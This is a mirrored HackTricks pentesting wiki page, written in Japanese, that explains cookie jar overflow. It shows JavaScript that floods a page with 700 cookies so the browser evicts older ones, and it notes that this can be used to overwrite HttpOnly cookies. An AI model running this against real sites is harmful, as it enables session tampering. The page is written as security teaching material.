mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1.2 KiB
1.2 KiB
{{#include ../../banners/hacktricks-training.md}}
ブラウザには、ページごとに保存できるクッキーの数の制限があります。したがって、何らかの理由でクッキーを消す必要がある場合、クッキージャーをオーバーフローさせることができます。そうすれば、最も古いクッキーが削除されます。
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
注意してください。異なるドメインを指すサードパーティのクッキーは上書きされません。
Caution
この攻撃は、HttpOnlyクッキーを上書きするためにも使用でき、削除してから希望の値でリセットすることができます。
これをこのラボの投稿で確認してください。
{{#include ../../banners/hacktricks-training.md}}